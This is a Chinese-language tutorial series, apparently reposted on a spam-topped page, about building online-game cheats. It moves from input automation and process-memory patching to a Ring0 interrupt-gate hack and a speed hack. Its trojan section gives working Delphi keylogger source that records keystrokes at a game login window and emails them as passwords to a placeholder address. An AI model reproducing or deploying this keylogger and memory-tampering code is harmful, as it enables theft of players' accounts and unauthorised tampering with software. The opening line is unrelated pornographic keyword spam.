国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

在幾年前我看到別人玩網(wǎng)絡游戲用上了外掛，做為程序員的我心里實在是不爽，想搞清楚這到底是怎么回事。就拿了一些來研究，小有心得，拿出來與大家共享，外掛無非就是分幾種罷了（依制作難度）：1、動作式，所謂動作式，就是指用API發(fā)命令給窗口或API控制鼠標、鍵盤等，使游戲里的人物進行流動或者攻擊，最早以前的“石器”外掛就是這種方式。（這種外掛完全是垃圾，TMD，只要會一點點API的人都知道該怎么做，不過這種外掛也是入門級的好東東，雖然不能提高你的戰(zhàn)斗力，但是可以提高你的士氣^_^）2、本地修改式，這種外掛跟傳統(tǒng)上的一些游戲修改器沒有兩樣，做這種外掛在編程只需要對內(nèi)存地址有一點認識并且掌握API就可以實現(xiàn)，“精靈”的外掛這是這種方式寫成的，它的難點在于找到那些地址碼，找地址一般地要借助于別人的工具，有的游戲還有雙碼校驗，正正找起來會比較困難。（這種外掛，比上一種有一點點難度，但是這種外掛做起來能夠用，也是有一定難度的啦~~，這種外掛可以很快提升你對內(nèi)存地址的理解及應用，是你編程技術(shù)提高的好東東）3、木馬式，這種外掛的目的是幫外掛制作者偷到用戶的密碼（TMD，“爛”就一個字，不過要知已知彼所以還是要談一下啦~~），做這種外掛有一定的難度，需要HOOK或鍵盤監(jiān)視技術(shù)做底子，才可以完成，它的原理是先首截了用戶的賬號或密碼，然后發(fā)到指定郵箱。（我以前寫過這樣的東東，但是從來沒有用過，我知道這種東東很不道德，所以以后千萬別用呀！~~）4、加速式，這種外掛可以加快游戲的速度……（對不起大家，這種東東我沒有實際做過，所以不能妄自評，慚愧~~）5、封包式，這種外掛是高難度外掛，需要有很強的編程功力才可以寫得出來。它的原理是先截取封包，后修改，再轉(zhuǎn)發(fā)（Kao,說起來簡單，你做一個試試~~~~）。這種外掛適用于大多數(shù)網(wǎng)絡游戲，像WPE及一些網(wǎng)絡游戲外掛都是用這種方式寫成的，編寫這種外掛需要apihook技術(shù)，winsock技術(shù)這幾種外掛之中，前三種可以用ＶＢ，ＤＥＬＰＨＩ等語言比較好實現(xiàn)，后兩種則要用ＶＣ等底層支持比較好的編程工具才好實現(xiàn)。現(xiàn)在就依次（制作難度）由淺到深談談我對外掛制作的一些認識吧~~~~首先，先來談一下動作式的外掛，這也是我第一次寫外掛時做的最簡單的一種。記得還在“石器”時代的時候，我看到別人掛著一種軟件（外掛）人物就可以四外游走（當時我還不知道外掛怎么回事^_^），于是找了這種軟件過來研究（拿來后才聽別人說這叫外掛），發(fā)現(xiàn)這種東東其實實現(xiàn)起來并不難，仔佃看其實人物的行走無非就是鼠標在不同的地方點來點去而已，看后就有實現(xiàn)這功能的沖動，隨后跑到MSDN上看了一些資料，發(fā)現(xiàn)這種實現(xiàn)這幾個功能，只需要幾個簡單的API函數(shù)就可以搞定：1、首先我們要知道現(xiàn)在鼠標的位置（為了好還原現(xiàn)在鼠標的位置）所以我們就要用到API函數(shù)GetCursorPos，它的使用方法如下：BOOL GetCursorPos( LPPOINT lpPoint// address of structure for cursor position );2、我們把鼠標的位置移到要到人物走到的地方，我們就要用到SetCursorPos函數(shù)來移動鼠標位置，它的使用方法如下：  BOOL SetCursorPos(int X, // horizontal positionint Y // vertical position);3、模擬鼠標發(fā)出按下和放開的動作，我們要用到mouse_event函數(shù)來實現(xiàn)，具休使用方法用下：  VOID mouse_event(DWORD dwFlags, // flags specifying various motion/click variantsDWORD dx, // horizontal mouse position or position changeDWORD dy, // vertical mouse position or position changeDWORD dwData, // amount of wheel movementDWORD dwExtraInfo // 32 bits of application-defined information); 在它的dwFlags處，可用的事件很多如移動MOUSEEVENTF_MOVE，左鍵按下MOUSEEVENTF_LEFTDOWN，左鍵放開MOUSEEVENTF_LEFTUP，具體的東東還是查一下MSDN吧~~~~~好了，有了以前的知識，我們就可以來看看人物移走是怎么實現(xiàn)的了： getcursorpos(point);setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是個自制的隨機坐標函數(shù)mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);setcursorpos(point.x,point.y); 看了以上的代碼，是不是覺得人物的游走很簡單啦~~，舉一仿三，還有好多好東東可以用這個技巧實現(xiàn)（我早就說過，TMD，這是垃圾外掛的做法，相信了吧~~~），接下來，再看看游戲里面自動攻擊的做法吧（必需游戲中攻擊支持快捷鍵的），道理還是一樣的，只是用的API不同罷了~~~，這回我們要用到的是keybd_event函數(shù)，其用法如下： VOID keybd_event(BYTE bVk, // virtual-key codeBYTE bScan, // hardware scan codeDWORD dwFlags, // flags specifying various function optionsDWORD dwExtraInfo // additional data associated with keystroke); 我們還要知道掃描碼不可以直接使用，要用函數(shù)MapVirtualKey把鍵值轉(zhuǎn)成掃描碼，MapVirtualKey的具體使用方法如下： UINT MapVirtualKey(UINT uCode, // virtual-key code or scan codeUINT uMapType // translation to perform); 好了，比說此快接鍵是CTRL+A，接下來讓我們看看實際代碼是怎么寫的： keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);keybd_event(65,mapvirtualkey(65,0),0,0);keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0); 首先模擬按下了CTRL鍵，再模擬按下A鍵，再模擬放開A鍵，最后放開CTRL鍵，這就是一個模擬按快捷鍵的周期。（看到這里，差不多對簡易外掛有了一定的了解了吧~~~~做一個試試？如果你舉一仿三還能有更好的東東出來，這就要看你的領悟能力了~~，不過不要高興太早這只是才開始，以后還有更復雜的東東等著你呢~~）上回我們對動作式外掛做了一個解析，動作式是最簡單的外掛，現(xiàn)在我們帶來看看，比動作式外掛更進一步的外掛棗本地修改式外掛的整個制作過程進行一個詳細的分解。具我所知，本地修改式外掛最典型的應用就是在“精靈”游戲上面，因為我在近一年前（“精靈”還在測試階段），我所在的公司里有很多同事玩“精靈”，于是我看了一下游戲的數(shù)據(jù)處理方式，發(fā)現(xiàn)它所發(fā)送到服務器上的信息是存在于內(nèi)存當中（我看后第一個感受是：修改這種游戲和修改單機版的游戲沒有多大分別，換句話說就是在他向服務器提交信息之前修改了內(nèi)存地址就可以了），當時我找到了地址于是修改了內(nèi)存地址，果然，按我的想法修改了地址，讓系統(tǒng)自動提交后，果然成功了~~~~~，后來“精靈”又改成了雙地址校檢，內(nèi)存校檢等等，在這里我就不廢話了~~~~，OK，我們就來看看這類外掛是如何制作的：在做外掛之前我們要對Windows的內(nèi)存有個具體的認識，而在這里我們所指的內(nèi)存是指系統(tǒng)的內(nèi)存偏移量，也就是相對內(nèi)存，而我們所要對其進行修改，那么我們要對幾個Windows API進行了解，OK，跟著例子讓我們看清楚這種外掛的制作和API的應用（為了保證網(wǎng)絡游戲的正常運行，我就不把找內(nèi)存地址的方法詳細解說了）：1、首先我們要用FindWindow,知道游戲窗口的句柄，因為我們要通過它來得知游戲的運行后所在進程的ID，下面就是FindWindow的用法： HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name); 2、我們GetWindowThreadProcessId來得到游戲窗口相對應進程的進程ID，函數(shù)用法如下： DWORD GetWindowThreadProcessId(HWND hWnd, // handle of windowLPDWORD lpdwProcessId // address of variable for process identifier); 3、得到游戲進程ID后，接下來的事是要以最高權(quán)限打開進程，所用到的函數(shù)OpenProcess的具體使用方法如下： HANDLE OpenProcess(DWORD dwDesiredAccess, // access flagBOOL bInheritHandle, // handle inheritance flagDWORD dwProcessId // process identifier); 在dwDesiredAccess之處就是設存取方式的地方，它可設的權(quán)限很多，我們在這里使用只要使用PROCESS_ALL_ACCESS 來打開進程就可以，其他的方式我們可以查一下MSDN。4、打開進程后，我們就可以用函數(shù)對存內(nèi)進行操作，在這里我們只要用到WriteProcessMemory來對內(nèi)存地址寫入數(shù)據(jù)即可（其他的操作方式比如說：ReadProcessMemory等，我在這里就不一一介紹了），我們看一下WriteProcessMemory的用法： BOOL WriteProcessMemory(HANDLE hProcess, // handle to process whose memory is written toLPVOID lpBaseAddress, // address to start writing toLPVOID lpBuffer, // pointer to buffer to write data toDWORD nSize, // number of bytes to writeLPDWORD lpNumberOfBytesWritten // actual number of bytes written); 5、下面用CloseHandle關閉進程句柄就完成了。這就是這類游戲外掛的程序?qū)崿F(xiàn)部份的方法，好了，有了此方法，我們就有了理性的認識，我們看看實際例子，提升一下我們的感性認識吧，下面就是XX游戲的外掛代碼，我們照上面的方法對應去研究一下吧： constResourceOffset: dword = $004219F4;resource: dword = 3113226621;ResourceOffset1: dword = $004219F8;resource1: dword = 1940000000;ResourceOffset2: dword = $0043FA50;resource2: dword = 1280185;ResourceOffset3: dword = $0043FA54;resource3: dword = 3163064576;ResourceOffset4: dword = $0043FA58;resource4: dword = 2298478592;varhw: HWND;pid: dword;h: Thandle;tt: Cardinal;beginhw := FindWindow('XX', nil);if hw = 0 thenExit;GetWindowThreadProcessId(hw, @pid);h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);if h = 0 thenExit;if flatcheckbox1.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);end;if flatcheckbox2.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);end;MessageBeep(0);CloseHandle(h);close; 這個游戲是用了多地址對所要提交的數(shù)據(jù)進行了校驗，所以說這類游戲外掛制作并不是很難，最難的是要找到這些地址。（方法大家已經(jīng)看清楚了，具體實踐就看大家的了，呵呵~~~~~~，不過不要高興太早，這種網(wǎng)絡游戲畢竟占少數(shù)，所以我會在以后的文章中對其他類型外掛做詳細解說，對了，請跟一下貼子，鼓勵一下，不然我真的沒有信心寫下面的文章了，謝謝）以前介紹過的動作式，本地修改式外掛是真正意義上的外掛，而今天本文要介紹的木馬式外掛，可能大多像木馬吧，是幫助做外掛的人偷取別人游戲的賬號及密碼的東東。因為網(wǎng)絡上有此類外掛的存在，所以今天不得不說一下（我個人是非常討厭這類外掛的，請看過本文的朋友不要到處亂用此技術(shù)，謝謝合作）。要做此類外掛的程序?qū)崿F(xiàn)方法很多（比如HOOK，鍵盤監(jiān)視等技術(shù)），因為HOOK技術(shù)對程序員的技術(shù)要求比較高并且在實際應用上需要多帶一個動態(tài)鏈接庫，所以在文中我會以鍵盤監(jiān)視技術(shù)來實現(xiàn)此類木馬的制作。鍵盤監(jiān)視技術(shù)只需要一個.exe文件就能實現(xiàn)做到后臺鍵盤監(jiān)視，這個程序用這種技術(shù)來實現(xiàn)比較適合。在做程序之前我們必需要了解一下程序的思路：1、我們首先知道你想記錄游戲的登錄窗口名稱。2、判斷登錄窗口是否出現(xiàn)。3、如果登錄窗口出現(xiàn)，就記錄鍵盤。4、當窗口關閉時，把記錄信息，通過郵件發(fā)送到程序設計者的郵箱。第一點我就不具體分析了，因為你們比我還要了解你們玩的是什么游戲，登錄窗口名稱是什么。從第二點開始，我們就開始這類外掛的程序?qū)崿F(xiàn)之旅：那么我們要怎么樣判斷登錄窗口雖否出現(xiàn)呢？其實這個很簡單，我們用FindWindow函數(shù)就可以很輕松的實現(xiàn)了： HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name); 實際程序?qū)崿F(xiàn)中，我們要找到'xx'窗口，就用FindWindow(nil,'xx')如果當返回值大于0時表示窗口已經(jīng)出現(xiàn)，那么我們就可以對鍵盤信息進行記錄了。先首我們用SetWindowsHookEx設置監(jiān)視日志，而該函數(shù)的用法如下： HHOOK SetWindowsHookEx(int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of thread to install hook for); 在這里要說明的是在我們程序當中我們要對HOOKPROC這里我們要通過寫一個函數(shù)，來實現(xiàn)而HINSTANCE這里我們直接用本程序的HINSTANCE就可以了，具體實現(xiàn)方法為：hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, Hinstance, 0);而HOOKPROC里的函數(shù)就要復雜一點點： function HookProc(iCode: integer; wParam: wParam; lParam: lParam): Lresult; stdcall;beginif findedtitle then //如果發(fā)現(xiàn)窗口后beginif (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等于鍵盤按下hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通過keyhookresult（自定義的函數(shù)，主要功能是轉(zhuǎn)換截獲的消息參數(shù)為按鍵名稱。我會在文章尾附上轉(zhuǎn)化函數(shù)的）轉(zhuǎn)換消息。If length(hookkey) > 0 then //如果獲得按鍵名稱beginWrite(hookkeyFile,hookkey); //把按鍵名稱寫入文本文件hookkey := '';end;end;end; 以上就是記錄鍵盤的整個過程，簡單吧，如果記錄完可不要忘記釋放呀，UnHookWindowsHookEx(hHook)，而Hhook,就是創(chuàng)建setwindowshookex后所返回的句柄。我們已經(jīng)得到了鍵盤的記錄，那么現(xiàn)在最后只要把記錄的這些信息發(fā)送回來，我們就大功造成了。其他發(fā)送這塊并不是很難，只要把記錄從文本文件里邊讀出來，用DELPHI自帶的電子郵件組件發(fā)一下就萬事OK了。代碼如下： assignfile(ReadFile,'hook.txt'); //打開hook.txt這個文本文件reset(ReadFile); //設為讀取方式tryWhile not Eof(ReadFile) do //當沒有讀到文件尾beginReadln(ReadFile,s,j); //讀取文件行body:=body+s;end;finallyclosefile(ReadFile); //關閉文件end;nmsmtp1.EncodeType:=uuMime; //設置編碼nmsmtp1.PostMessage.Attachments.Text:=''; //設置附件nmsmtp1.PostMessage.FromAddress:='XXX@XXX.com'; //設置源郵件地址nmsmtp1.PostMessage.ToAddress.Text:='XXX@XXX.com'; /設置目標郵件地址nmsmtp1.PostMessage.Body.Text:='密碼'+' '+body; //設置郵件內(nèi)容nmsmtp1.PostMessage.Subject:='password'; //設置郵件標題nmsmtp1.SendMail; //發(fā)送郵件 這個程序全部功能已經(jīng)實現(xiàn)，編編試試~~~對了，我以前寫的類似的作品可以在www.playicq.com上找得到。（其實做一個這樣的東東也不難，基本也是說不上什么技術(shù)可言。希望大看我的文章后不要到處亂應用呀~~~~小生在此有禮了~~~，最后要說的是我最近一段時間很忙，單位里有一堆事情等著我要去做（做項目，做研發(fā)，帶實習生，過CMM2~~~~累呀），所以第5篇也不得不推后出了，請大家諒解，做為對大家關心的補償，請大家有什么問題跟貼留言，如果我會，我會一一解答的，謝謝大家對我的文章的關心~~）附：function Keyhookresult(Lp: integer; Wp: integer): pchar;beginresult := '[Print Screen]';case lp of10688: result := '`';561: Result := '1';818: result := '2';1075: result := '3';1332: result := '4';1589: result := '5';1846: result := '6';2103: result := '7';2360: result := '8';2617: result := '9';2864: result := '0';3261: result := '-';3515: result := '=';4177: result := 'Q';4439: result := 'W';4677: result := 'E';4946: result := 'R';5204: result := 'T';5465: result := 'Y';5717: result := 'U';5961: result := 'I';6223: result := 'O';6480: result := 'P';6875: result := '[';7133: result := ']';11228: result := '\';7745: result := 'A';8019: result := 'S';8260: result := 'D';8518: result := 'F';8775: result := 'G';9032: result := 'H';9290: result := 'J';9547: result := 'K';9804: result := 'L';10170: result := ';';10462: result := '''';11354: result := 'Z';11608: result := 'X';11843: result := 'C';12118: result := 'V';12354: result := 'B';12622: result := 'N';12877: result := 'M';13244: result := ',';13502: result := '.';13759: result := '/';13840: result := '[Right-Shift]';14624: result := '[Space]';283: result := '[Esc]';15216: result := '[F1]';15473: result := '[F2]';15730: result := '[F3]';15987: result := '[F4]';16244: result := '[F5]';16501: result := '[F6]';16758: result := '[F7]';17015: result := '[F8]';17272: result := '[F9]';17529: result := '[F10]';22394: result := '[F11]';22651: result := '[F12]';10768: Result := '[Left-Shift]';14868: result := '[CapsLock]';3592: result := '[Backspace]';3849: result := '[Tab]';7441:if wp > 30000 thenresult := '[Right-Ctrl]'elseresult := '[Left-Ctrl]';13679: result := '[Num /]';17808: result := '[NumLock]';300: result := '[Print Screen]';18065: result := '[Scroll Lock]';17683: result := '[Pause]';21088: result := '[Num0]';21358: result := '[Num.]';20321: result := '[Num1]';20578: result := '[Num2]';20835: result := '[Num3]';19300: result := '[Num4]';19557: result := '[Num5]';19814: result := '[Num6]';18279: result := '[Num7]';18536: result := '[Num8]';18793: result := '[Num9]';19468: result := '[*5*]';14186: result := '[Num *]';19053: result := '[Num -]';20075: result := '[Num +]';21037: result := '[Insert]';21294: result := '[Delete]';18212: result := '[Home]';20259: result := '[End]';18721: result := '[PageUp]';20770: result := '[PageDown]';18470: result := '[UP]';20520: result := '[DOWN]';19237: result := '[LEFT]';19751: result := '[RIGHT]';7181: result := '[Enter]';end;end;我一直沒有搞懂制作加速外掛是怎么一回事，直到前不久又翻出來了2001年下半期的《程序員合訂本》中《“變速齒輪”研究手記》重新回味了一遍，才有了一點點開悟，隨后用Delphi重寫了一遍，下面我就把我的心得說給大家聽聽，并且在此感謝《“變速齒輪”研究手記》作者褚瑞大虲給了提示。廢話我就不多說了，那就開始神奇的加速型外掛體驗之旅吧！原本我一直以為加速外掛是針對某個游戲而寫的，后來發(fā)現(xiàn)我這種概念是不對的，所謂加速外掛其實是修改時鐘頻率達到加速的目的。以前DOS時代玩過編程的人就會馬上想到，這很簡單嘛不就是直接修改一下8253寄存器嘛，這在以前DOS時代可能可以行得通，但是windows則不然。Windows是一個32位的操作系統(tǒng)，并不是你想改哪就改哪的（微軟的東東就是如此霸氣，說不給你改就不給你改^_^），但要改也不是不可能，我們可以通過兩種方法來實現(xiàn)：第一是寫一個硬件驅(qū)動來完成，第二是用Ring0來實現(xiàn)（這種方法是CIH的作者陳盈豪首用的，它的原理是修改一下IDE表->創(chuàng)建一個中斷門->進入Ring0->調(diào)用中斷修改向量，但是沒有辦法只能用ASM匯編來實現(xiàn)這一切*_*，做為高級語言使用者慘啦?。?，用第一種方法用點麻煩，所以我們在這里就用第二種方法實現(xiàn)吧~~~在實現(xiàn)之前我們來理一下思路吧：1、我們首先要寫一個過程在這個過程里嵌入?yún)R編語言來實現(xiàn)修改IDE表、創(chuàng)建中斷門，修改向量等工作2、調(diào)用這個過程來實現(xiàn)加速功能好了，現(xiàn)在思路有了，我們就邊看代碼邊講解吧：首先我們建立一個過程，這個過程就是本程序的核心部份：procedure SetRing(value:word); stdcall;const ZDH = $03; ／／ 設一個中斷號varIDT : array [0..5] of byte; ／／ 保存IDT表OG : dword; ／／存放舊向量beginasmpush ebxsidt IDT ／／讀入中斷描述符表mov ebx, dword ptr [IDT+2] ／／IDT表基地址add ebx, 8*ZDH ／／計算中斷在中斷描述符表中的位置cli ／／關中斷mov dx, word ptr [ebx+6]shl edx, 16dmov dx, word ptr [ebx]mov [OG], edxmov eax, offset @@Ring0 ／／指向Ring0級代碼段mov word ptr [ebx], ax ／／低16位,保存在1,2位shr eax, 16dmov word ptr [ebx+6], ax ／／高16位，保存在6,7位int ZDH ／／中斷mov ebx, dword ptr [IDT+2] ／／重新定位add ebx, 8*ZDHmov edx, [OG]mov word ptr [ebx], dxshr edx, 16dmov word ptr [ebx+6], dx ／／恢復被改了的向量pop ebxjmp @@exitasm ／／到exitasm處@@Ring0: ／／Ring0,這個也是最最最核心的東東mov al,$34 ／／寫入8253控制寄存器out $43,almov ax,value?。瘜懭攵〞r值out $40,al ／／寫定時值低位mov al,ahout $40,al ／／寫定時值高位iretd ／／返回@@exitasm:end;end;最核心的東西已經(jīng)寫完了，大部份讀者是知其然不知其所以然吧，呵呵，不過不知其所以然也然。下面我們就試著用一下這個過程來做一個類似于“變速齒輪”的一個東東吧！先加一個窗口，在窗口上放上一個trackbar控件把其Max設為20，Min設為1，把Position設為10，在這個控件的Change事件里寫上：SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));因為windows默認的值為$1742，所以我們把1742做為基數(shù)，又因為值越小越快，反之越慢的原理，所以寫了這樣一個公式，好了，這就是“變速齒輪”的一個Delphi＋ASM版了（只適用于win9X），呵呵，試一下吧，這對你幫助會很大的，呵呵。我的文章名字沒有叫《網(wǎng)絡游戲外掛制作之我所見（6）》是因為本文六以后研究的方向就是網(wǎng)絡數(shù)據(jù)封包的內(nèi)容了，而本文將要介紹的windows 2000/Xp下實現(xiàn)加速形外掛的制作。在win2000里，我們不可能實現(xiàn)在直接對端口進行操作，Ring0也失了效，有的人就會想到，我們可以寫驅(qū)動程序來完成呀，但在這里我告訴你，windows2000的驅(qū)動不是一個VxD就能實現(xiàn)的，像我這樣的低手是寫不出windows所用的驅(qū)動WDM的，沒辦法，我只有借助外力實現(xiàn)了，ProtTalk就是一個很好的設備驅(qū)動，他很方便的來實現(xiàn)對低層端口的操作，從而實現(xiàn)加速外掛。1、我們首先要下一個PortTalk驅(qū)動，他的官方網(wǎng)站是http://www.beyondlogic.org2、我們要把里面的prottalk.sys拷貝出來。3、建立一個Protalk.sys的接口（我想省略了，大家可以上http://www.freewebs.com/liuyue/porttalk.pas下個pas文件自己看吧）4、實現(xiàn)加速外掛。本來就篇就是補充篇原理我也不想講太多了，下面就講一下這程序的實現(xiàn)方法吧，如果說用ProtTalk來操作端口就容易多了，比win98下用ring權(quán)限操作方便。1、新建一個工程，把剛剛下的接口文件和Protalk.sys一起拷到工程文件保存的文件夾下。2、我們在我們新建的工程加入我們的接口文件useswindows,ProtTalk……3、我們建立一個過程procedure SetRing(value:word);beginif not OpenPortTalk then exit;outportb($43,$34);outportb($40,lo(Value));outprotb($40,hi(value));ClosePortTalk;end;4、先加一個窗口，在窗口上放上一個trackbar控件把其Max設為20，Min設為1，把Position設為10，在這個控件的Change事件里寫上：SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));就這么容易，win2000的也就寫出來了，我最近真的很忙，請大家耐心等待~~~~謝謝大家支持ing。